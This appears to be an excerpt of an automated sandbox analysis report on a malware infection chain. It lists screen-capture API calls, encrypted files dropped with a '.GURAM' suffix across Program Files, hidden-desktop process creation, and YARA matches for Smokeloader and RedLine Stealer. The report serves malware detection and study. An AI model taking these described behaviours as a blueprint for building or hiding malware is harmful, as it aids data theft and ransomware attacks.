                          Source: C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exeCode function: 8_2_00431BB0 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,8_2_00431BB0

                          Spam, unwanted Advertisements and Ransom Demands

                          barindex
                          Writes many files with high entropy
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[2].exe entropy: 7.99505709583Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1014796001\bab5c1b6a6.exe entropy: 7.99505709583Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1014795001\09be480dc7.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\fuckingdllENCR[1].dll entropy: 7.99823177189Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1014796001\bab5c1b6a6.exeFile created: C:\Users\user\AppData\Local\Temp\main\file.bin entropy: 7.99994867689Jump to dropped file
                          Source: C:\Windows\System32\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\main\file.zip (copy) entropy: 7.99994867689Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files\7-Zip\Lang\hi.txt entropy: 7.99073676826Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files\7-Zip\Lang\ka.txt entropy: 7.990797447Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\AutoIt3\Uninstall.exe entropy: 7.99743642528Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe entropy: 7.99920246804Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\Mozilla Maintenance Service\Uninstall.exe entropy: 7.99858577883Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Users\Default\NTUSER.DAT.LOG1 entropy: 7.99711183909Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Users\Default\NTUSER.DAT.LOG2 entropy: 7.99137412168Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Users\Default\NTUSER.DAT{53b39e88-18c4-11ea-a811-000d3aa4692b}.TM.blf entropy: 7.99727702238Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files\7-Zip\7-zip.chm entropy: 7.99831431265Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files\7-Zip\7-zip.dll entropy: 7.99832003499Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files\7-Zip\7-zip32.dll entropy: 7.99656329731Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files\7-Zip\Lang\mng2.txt entropy: 7.99071108978Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files\7-Zip\Lang\mng.txt entropy: 7.99109887897Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files\7-Zip\Lang\si.txt entropy: 7.99025415176Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files\7-Zip\7z.sfx entropy: 7.99918203227Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files\7-Zip\History.txt entropy: 7.99716685523Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files\7-Zip\7zCon.sfx entropy: 7.9990178394Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.Assembly.dll entropy: 7.99616459467Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX.psd1 entropy: 7.99403106533Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX.chm entropy: 7.99898115939Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.Assembly.xml entropy: 7.99662017419Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll entropy: 7.99661341169Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3_DLL.lib entropy: 7.99312570715Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3_x64_DLL.lib entropy: 7.99417719394Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\AutoIt3\SciTE\au3.keywords.properties entropy: 7.99806205041Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\AutoIt3\Extras\Geshi\autoit.php entropy: 7.99853722395Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\AutoIt3\Extras\AutoUpdateIt\AutoSQLiteUpdateIt.au3 entropy: 7.99442096964Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\AutoIt3\Extras\AutoUpdateIt\AutoUpdateIt.au3 entropy: 7.9947541012Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\Microsoft Office\Office16\OSPP.HTM entropy: 7.99898652508Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\Microsoft Office\Office16\OSPP.VBS entropy: 7.99826115248Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXE entropy: 7.99892175784Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Client\api-ms-win-core-file-l2-1-0.dll entropy: 7.99063029694Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Client\api-ms-win-core-localization-l1-2-0.dll entropy: 7.99159649861Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\Microsoft Office\Office16\SLERROR.XML entropy: 7.99460541806Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Client\api-ms-win-core-processthreads-l1-1-1.dll entropy: 7.99096775537Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\Microsoft Office\PackageManifests\AppXManifest.90160000-0015-0000-0000-0000000FF1CE.xml entropy: 7.99934543291Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\Microsoft Office\PackageManifests\AppXManifest.90160000-0019-0000-0000-0000000FF1CE.xml entropy: 7.99937516783Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Client\api-ms-win-crt-convert-l1-1-0.dll entropy: 7.9918954637Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\Microsoft Office\PackageManifests\AppXManifest.90160000-002A-0000-1000-0000000FF1CE.xml entropy: 7.99253090543Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\Microsoft Office\PackageManifests\AppXManifest.90160000-0090-0000-0000-0000000FF1CE.xml entropy: 7.99943015475Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Client\api-ms-win-crt-filesystem-l1-1-0.dll entropy: 7.99195428783Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\Microsoft Office\PackageManifests\AppXManifest.90160000-00A1-0000-0000-0000000FF1CE.xml entropy: 7.99685022803Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Client\api-ms-win-crt-environment-l1-1-0.dll entropy: 7.99188378247Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Client\api-ms-win-crt-conio-l1-1-0.dll entropy: 7.99042665094Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Client\api-ms-win-crt-runtime-l1-1-0.dll entropy: 7.99208779446Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Client\api-ms-win-crt-private-l1-1-0.dll entropy: 7.99773797712Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Client\api-ms-win-crt-process-l1-1-0.dll entropy: 7.99102410998Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Client\api-ms-win-crt-multibyte-l1-1-0.dll entropy: 7.99236910163Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Client\api-ms-win-crt-math-l1-1-0.dll entropy: 7.99343810757Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exe entropy: 7.99942016225Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\autoit3\Uninstall.exe.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy) entropy: 7.99743642528Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\mozilla maintenance service\Uninstall.exe.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy) entropy: 7.99858577883Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Users\Default\NTUSER.DAT.LOG1.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy) entropy: 7.99711183909Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\mozilla maintenance service\maintenanceservice.exe.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy) entropy: 7.99920246804Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Users\Default\NTUSER.DAT{53b39e88-18c4-11ea-a811-000d3aa4692b}.TM.blf.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy) entropy: 7.99727702238Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Users\Default\NTUSER.DAT.LOG2.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy) entropy: 7.99137412168Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files\7-Zip\7-zip.chm.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy) entropy: 7.99831431265Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files\7-Zip\7-zip.dll.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy) entropy: 7.99832003499Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files\7-Zip\7-zip32.dll.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy) entropy: 7.99656329731Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files\7-Zip\7z.sfx.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy) entropy: 7.99918203227Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files\7-Zip\History.txt.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy) entropy: 7.99716685523Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files\7-Zip\7zCon.sfx.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy) entropy: 7.9990178394Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\autoit3\AutoItX\AutoItX.psd1.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy) entropy: 7.99403106533Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\autoit3\AutoItX\AutoItX3.Assembly.dll.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy) entropy: 7.99616459467Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\autoit3\AutoItX\AutoItX3.Assembly.xml.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy) entropy: 7.99662017419Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\autoit3\AutoItX\AutoItX.chm.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy) entropy: 7.99898115939Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\autoit3\AutoItX\AutoItX3.PowerShell.dll.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy) entropy: 7.99661341169Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\autoit3\AutoItX\AutoItX3_DLL.lib.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy) entropy: 7.99312570715Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\autoit3\AutoItX\AutoItX3_x64_DLL.lib.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy) entropy: 7.99417719394Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\autoit3\SciTE\au3.keywords.properties.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy) entropy: 7.99806205041Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\Office16\OSPP.HTM.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy) entropy: 7.99898652508Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\Office16\OSPP.VBS.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy) entropy: 7.99826115248Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\Office16\OSPPREARM.EXE.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy) entropy: 7.99892175784Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\Office16\SLERROR.XML.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy) entropy: 7.99460541806Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\PackageManifests\AppXManifest.90160000-0015-0000-0000-0000000FF1CE.xml.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy) entropy: 7.99934543291Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\PackageManifests\AppXManifest.90160000-0019-0000-0000-0000000FF1CE.xml.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy) entropy: 7.99937516783Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\PackageManifests\AppXManifest.90160000-002A-0000-1000-0000000FF1CE.xml.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy) entropy: 7.99253090543Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\PackageManifests\AppXManifest.90160000-0090-0000-0000-0000000FF1CE.xml.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy) entropy: 7.99943015475Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\PackageManifests\AppXManifest.90160000-00A1-0000-0000-0000000FF1CE.xml.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy) entropy: 7.99685022803Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\autoit3\Aut2Exe\upx.exe.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy) entropy: 7.99942016225Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files\7-Zip\Lang\hi.txt.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy) entropy: 7.99073676826Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files\7-Zip\Lang\ka.txt.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy) entropy: 7.990797447Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files\7-Zip\Lang\mng.txt.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy) entropy: 7.99109887897Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files\7-Zip\Lang\mng2.txt.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy) entropy: 7.99071108978Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files\7-Zip\Lang\si.txt.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy) entropy: 7.99025415176Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\autoit3\Extras\AutoUpdateIt\AutoUpdateIt.au3.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy) entropy: 7.9947541012Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\autoit3\Extras\AutoUpdateIt\AutoSQLiteUpdateIt.au3.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy) entropy: 7.99442096964Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\autoit3\Extras\Geshi\autoit.php.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy) entropy: 7.99853722395Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\main\7z.exeFile created: C:\Users\user\AppData\Local\Temp\main\extracted\file_7.zip entropy: 7.9992359396Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\main\7z.exeFile created: C:\Users\user\AppData\Local\Temp\main\extracted\file_6.zip entropy: 7.99771683584Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeCode function: 7_2_0040AB8F memset,wsprintfA,OpenDesktopA,CreateDesktopA,memset,lstrcatA,lstrcatA,lstrcatA,memset,lstrcpyA,lstrcpyA,CreateProcessA,Sleep,CloseDesktop,7_2_0040AB8F

                          System Summary

                          barindex
                          Malicious sample detected (through community Yara rule)
                          Source: 00000024.00000002.4211879385.0000000004B50000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                          Source: 00000007.00000002.3467949827.0000000000AD0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                          Source: 00000007.00000002.3469557335.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                          Source: 00000024.00000002.4175579717.0000000000E0C000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                          Binary is likely a compiled AutoIt script file
                          Source: 955e8e90f4.exe, 00000009.00000000.2487057831.0000000000BE2000.00000002.00000001.01000000.0000000B.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_11164fec-e
                          Source: 955e8e90f4.exe, 00000009.00000000.2487057831.0000000000BE2000.00000002.00000001.01000000.0000000B.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_dc89b1da-8
                          Source: 955e8e90f4.exe, 0000001C.00000002.3994740528.0000000000BE2000.00000002.00000001.01000000.0000000B.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_0d205221-6
                          Source: 955e8e90f4.exe, 0000001C.00000002.3994740528.0000000000BE2000.00000002.00000001.01000000.0000000B.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_a59db703-5
                          Drops password protected ZIP file
                          Source: file.bin.39.drZip Entry: encrypted
                          PE file contains section with special chars
                          Source: file.exeStatic PE information: section name:
                          Source: file.exeStatic PE information: section name: .idata
                          Source: skotes.exe.0.drStatic PE information: section name:
                          Source: skotes.exe.0.drStatic PE information: section name: .idata
                          Source: random[1].exe2.6.drStatic PE information: section name:
                          Source: random[1].exe2.6.drStatic PE information: section name: .idata
                          Source: random[1].exe2.6.drStatic PE information: section name:
                          Source: b6866cbf49.exe.6.drStatic PE information: section name:
                          Source: b6866cbf49.exe.6.drStatic PE information: section name: .idata
                          Source: b6866cbf49.exe.6.drStatic PE information: section name:
                          Source: random[2].exe.6.drStatic PE information: section name:
                          Source: random[2].exe.6.drStatic PE information: section name: .idata
                          Source: fa1ce2a324.exe.6.drStatic PE information: section name:
                          Source: fa1ce2a324.exe.6.drStatic PE information: section name: .idata
                          Source: random[2].exe0.6.drStatic PE information: section name:
                          Source: random[2].exe0.6.drStatic PE information: section name: .idata
                          Source: random[2].exe0.6.drStatic PE information: section name:
                          Source: 09be480dc7.exe.6.drStatic PE information: section name:
                          Source: 09be480dc7.exe.6.drStatic PE information: section name: .idata
                          Source: 09be480dc7.exe.6.drStatic PE information: section name:
                          Source: JEBGCBAFCG.exe.27.drStatic PE information: section name:
                          Source: JEBGCBAFCG.exe.27.drStatic PE information: section name: .idata
                          Source: random[3].exe.27.drStatic PE information: section name:
                          Source: random[3].exe.27.drStatic PE information: section name: .idata
